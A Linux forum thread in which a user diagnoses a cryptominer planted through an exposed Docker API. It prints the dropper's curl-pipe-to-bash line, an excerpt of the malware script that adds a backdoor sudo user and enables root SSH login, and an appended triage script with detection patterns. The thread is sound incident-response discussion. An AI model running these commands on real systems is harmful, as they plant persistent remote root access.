After repeated firefox crashes I suspect a malware infection

Firefox randomly shuts down, and at the same time the CPU usage increases heavily.

I noticed that when I check what is happening with htop, four new processes appear, each of them named /var/tmp/sic/sic, and they take up all the CPU.

I checked in my /var/tmp/sic folder and discovered a package.json file that looks very suspicious to me, as it has attributes named "donate-level" and "donate-over-proxy" as well as a part '"coin":"monero"'.

I am not very experienced with Linux yet and would be very thankful for any suggestions on how to further investigate this matter. I am also happy to provide any kind of logs if needed.

Start Firefox in safe mode.

What about the installed extensions?

5 Likes

From reading this, it would come from a Firefox add-on that includes a cryptominer. So checking your add-ons would indeed be a good first step.

Also, the use of package.json indicates a pre-WebExtension add-on, which has not been supported since Firefox 57. If you are still holding on to an old Firefox (like the firefox-esr52 I spot in the AUR), I think it's time you switched to the latest version.

4 Likes

Can you start Firefox from the console and post the output here?

1 Like

In addition to the posts above: some sites use cryptomining via JavaScript. A mere visit with JavaScript enabled has your machine mining for them.
This will only use CPU resources while the site is open in your browser.

2 Likes

Thank you very much for all your comments!

I did some more research by googling parts of that package.json file, especially one long hash, and now I am pretty sure I got hijacked because I misconfigured Docker and afterwards stupidly exposed some ports on a public network. Everything is very well explained in this article, which even names the specific hash I found in my package.json. It points to a cryptocurrency wallet:

I think Firefox "noticed" this in some way and therefore shut down?

So I now have the problem that I do not know how to get rid of this infection.

Every now and then four very CPU-intensive processes start by themselves; this is a sample htop output for one of them:

19216 root 20 411592 12808 1532 S 398,7 0,2 26:06.12 /var/tmp/sic/sic

I can kill them manually via kill pid_number and I can remove the sic folder in /var/tmp/, but they keep reappearing.

I also removed docker via the pacman remove command.

I am not sure how to proceed with this, or whether this is the right place to ask about it. If someone can tell me how to further investigate this, I would be very thankful!

I tried starting in safe mode without any extensions; the problem keeps appearing as described in my new reply about my crypto hijack suspicions.

I also discovered this in htop, which seems to download the mining software, if I am not mistaken:

root 22250 0.0 0.0 7464 3060 ? Ss 15:30 0:00 /bin/sh -c curl -sL http://ix.io/1XQa | bash -s

So it seems this infection has root access, if I understand this correctly?

Holy crap, that script is quite evil. It disables the firewall, adds a user with root permissions, starts sshd, etc.
It made some cron entries which execute every xx minutes. Those are actually downloading and initiating it again and again.

You could try to reverse everything in this script (starting with removing the cron jobs), but my advice would be to reinstall your system.
Once compromised you can never be sure if you really got rid of everything.
(Also the script could have been different in the past and it could have done other nasty stuff...)

4 Likes

As with all infections: reformat and reinstall is the only sane advice.

3 Likes

Thank you! That's a depressing answer, but so I guess I learned my lesson about not loosely exposing ports ...

1 Like

This is why I think Linux is not as safe as people think. There are millions of scripts, extensions, etc. that can do harm more easily than on other platforms. Linux's only advantage is that nobody is using it (0,05%), not counting servers etc.

2 Likes

Looking through that script will hint you towards repairing and not having to reinstall, but reinstalling would definitely take care of it. Your /home directories should be fine to reuse, since that whole script is about adding groups/users with root privilege and changing file attributes:

chattr -aiu /var/spool/cron/
chmod +700 /var/spool/cron/
chattr -auiu /var/spool/cron/root/
chmod +700 /var/spool/cron/root/
chattr -aui /var/spool/cron/root
chmod +700 /var/spool/cron/root
useradd -m -p '$1$EuTlnGKV$I6ULVhrfUCnEpFqLGFVHY0' darmok;
usermod -aG sudoers darmok;
usermod -aG darmok;
usermod -aG root darmok;
adduser darmok sudo;
echo "darmok    ALL=(ALL)       ALL" >> /etc/sudoers
sed -i 's/PermitRootLogin no/PermitRootLogin yes/g' /etc/ssh/sshd_config;

You really stepped in some sh1t, lesson learned I guess :man_shrugging:

4 Likes

"Darmok and Jalad at Tanagra" :grin:

4 Likes

Or maybe this is just a PEBKAC issue, not out of ignorance or neglect but a simple human mistake.

3 Likes


:stuck_out_tongue_winking_eye:

Yes it is, but not every user is a code guru.

According to @moson this script has root access. Before blaming Linux we should know how this root access was achieved. Was it a security hole in Linux, or was root access granted by other means, e.g. the malware is run with user privileges but the user has sudo rights on ALL without a password? Some people have that setup. This would be a misconfiguration by the admin.

Before you make a judgement like this you should first know how this script got root access.

5 Likes

From what I understood @ruderngespra exposed the docker REST api endpoint:

Docker provides REST APIs for management of its service, including the ability to create and start/stop containers. By default, Docker only enables Unix socket access to its REST APIs. To enable remote access to the Docker service’s REST APIs, one has to configure Docker to listen on TCP ports. The conventional ports used by Docker are 2375 and 2376 which, when enabled, would by default provide unencrypted and unauthenticated access to the docker REST APIs.

The docker service runs with root permissions...

3 Likes
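A small triage helper for the indicators this thread describes (the script excerpt above with its PermitRootLogin and sudoers changes, the curl | bash cron loop, the /var/tmp/sic/sic processes, and dockerd reachable on 2375/2376). This is an added example, not code from any post; every function reads text on stdin, and the samples at the bottom are constructed, not real output from the poster's machine.

```shell
#!/usr/bin/env bash
# Triage helpers for the indicators discussed in this thread. Added example,
# not code from any post: it only reads text on stdin, so it can be pointed at
# saved command output or at the constructed samples at the bottom.

# Processes whose binary lives in a scratch directory (like /var/tmp/sic/sic).
# Input: `ps aux` output; output: "PID COMMAND" per hit.
find_tmp_execs() {
  awk '$11 ~ "^(/var/tmp|/tmp|/dev/shm)/" { print $2, $11 }'
}

# Cron lines that fetch something and pipe it into a shell (the re-infection loop).
# Input: crontab text, e.g. `cat /var/spool/cron/*` or `crontab -l`.
download_crons() {
  grep -E '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh'
}

# Exit 0 if sshd has an active "PermitRootLogin yes" (the script sed's this in).
# Input: /etc/ssh/sshd_config
root_login_enabled() {
  grep -Eq '^[[:space:]]*PermitRootLogin[[:space:]]+yes'
}

# Sudoers user specs for anyone other than root and the usual admin groups.
# Input: /etc/sudoers (and /etc/sudoers.d/*). Tune the exclusions to your distro.
unexpected_sudoers() {
  grep -Ev '^[[:space:]]*(#|@|$|Defaults|root[[:space:]]|%wheel[[:space:]]|%sudo[[:space:]])'
}

# Exit 0 if something listens on the Docker TCP ports (2375 plain, 2376 TLS).
# Input: `ss -ltn` output.
docker_tcp_exposed() {
  grep -Eq '^LISTEN.*:(2375|2376)[[:space:]]'
}

# Constructed samples (not real output from the poster's machine).
SAMPLE_PS='root 19216 398.7 0.2 411592 12808 ? S 14:02 26:06 /var/tmp/sic/sic
root 1 0.0 0.1 170000 12000 ? Ss 10:00 0:01 /usr/lib/systemd/systemd'
SAMPLE_CRON='*/15 * * * * curl -sL http://example.invalid/x | bash -s
0 3 * * * /usr/bin/updatedb'
SAMPLE_SS='LISTEN 0 4096 *:2375 *:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*'

if [ "${1:-}" = "--demo" ]; then
  printf '%s\n' "$SAMPLE_PS" | find_tmp_execs
  printf '%s\n' "$SAMPLE_CRON" | download_crons
  printf '%s\n' "$SAMPLE_SS" | docker_tcp_exposed && echo "dockerd reachable over TCP"
fi
```

On a suspect host, source the file and feed it real output instead: ps aux | find_tmp_execs, cat /var/spool/cron/* | download_crons, root_login_enabled < /etc/ssh/sshd_config, unexpected_sudoers < /etc/sudoers, ss -ltn | docker_tcp_exposed.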

Yes, every malware infection is mostly the user's fault.
